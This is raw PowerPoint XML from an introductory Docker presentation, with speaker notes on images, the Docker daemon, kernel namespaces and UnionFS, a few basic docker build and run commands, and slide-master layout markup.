              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> containers. Next we have our bin/libs just like we do on our VMs. But instead of them being run on a guest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, they get built into special packages called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> images, then the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> daemon runs those images. Then we have the applications that would be run and managed independently by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> daemon. Typically each application and its dependencies get packed into the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> image and each application is isolated.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F96A516-0989-4CB2-9728-6FBD964914C0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1803975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6A516-0989-4CB2-9728-6FBD964914C0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="628263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Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> run -d -p 81:80 ce05b72131c8</a:t>
            </a:r>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1865476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 containers possible. What makes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it possible to run a process in isolation. And without an overhead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>boointng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Answwer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to that lies in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  kernel which offers us these features that makes it possible to run these processes in isolation and sandboxed environment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>stystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> namespace. Each container can have its own OS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. Each container can have its own network namespace and have its own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> address and interface. Each container can have its own hostname. A new security feature has been added where we can have a user namespace. Earlier if you were a root user inside the container, if you could breakout of the container, you could gain root access on the system but its no more possible because you can map it to a non-root user on the system even if you breakout of the container. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So that’s what makes running processes in isolation possible.</a:t>
            </a:r>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err="1" smtClean="0"/>
              <a:t>UnionFS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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Union file systems, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UnionFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>, are file systems that operate by creating layers, making them very lightweight and fast. Docker Engine uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UnionFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> to provide the building blocks for containers. Docker Engine can use multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UnionFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> variants, including AUFS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>btrfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DeviceMapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1433733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 containers possible. What makes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it possible to run a process in isolation. And without an overhead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>boointng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Answwer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to that lies in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  kernel which offers us these features that makes it possible to run these processes in isolation and sandboxed environment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>stystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> namespace. Each container can have its own OS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. Each container can have its own network namespace and have its own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> address and interface. Each container can have its own hostname. A new security feature has been added where we can have a user namespace. Earlier if you were a root user inside the container, if you could breakout of the container, you could gain root access on the system but its no more possible because you can map it to a non-root user on the system even if you breakout of the container. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So that’s what makes running processes in isolation possible.</a:t>
            </a:r>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err="1" smtClean="0"/>
              <a:t>UnionFS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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Union file systems, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UnionFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>, are file systems that operate by creating layers, making them very lightweight and fast. Docker Engine uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UnionFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> to provide the building blocks for containers. Docker Engine can use multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UnionFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> variants, including AUFS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>btrfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DeviceMapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{201D8A07-97E7-4C1A-9693-9D89842C91CA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20217824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3.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3.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92929"/>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7959903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45" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="42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US" sz="6000" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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4DB999E-9550-43DC-8131-370D1E84360F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6179820"/>
            <a:ext cx="2362200" cy="67818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9851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69F84D-B180-45C3-85C3-F847D118D020}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020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C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11297211" y="6356350"/>
            <a:ext cx="18489" cy="365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96755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2"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38966032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2" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="42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US" sz="2800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="685801"/>
            <a:ext cx="4029075" cy="775597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>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5183188" y="685800"/>
            <a:ext cx="6475412" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1600"/>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742950" y="1969136"/>
            <a:ext cx="4029075" cy="420306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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{49D2DE24-6C98-497D-92FD-CFEBA025B737}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020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C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="685801"/>
            <a:ext cx="91440" cy="775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04018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2"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28994763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16" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="42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US" sz="2800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183188" y="685801"/>
            <a:ext cx="6475412" cy="5486399"/>
          </a:xfrm>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 name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8416E416-996C-4C21-A2B9-505EFB31A916}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020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C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="685801"/>
            <a:ext cx="4029075" cy="775597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="1969136"/>
            <a:ext cx="4029075" cy="420306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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="685801"/>
            <a:ext cx="91440" cy="775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04899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9774525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4" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="42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US" sz="2800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="365125"/>
            <a:ext cx="10915650" cy="775597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516252" y="1600201"/>
            <a:ext cx="11142347" cy="4576762"/>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74FB3C4-B60A-4519-B32F-EEA203AE88F4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020</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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11297211" y="6356350"/>
            <a:ext cx="18489" cy="365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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11201400" y="6356350"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="365125"/>
            <a:ext cx="91440" cy="775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534343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12"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4244137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70" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="42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US" sz="2800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{14407030-235A-44B9-A19C-F0D6EF9CAA00}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020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C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
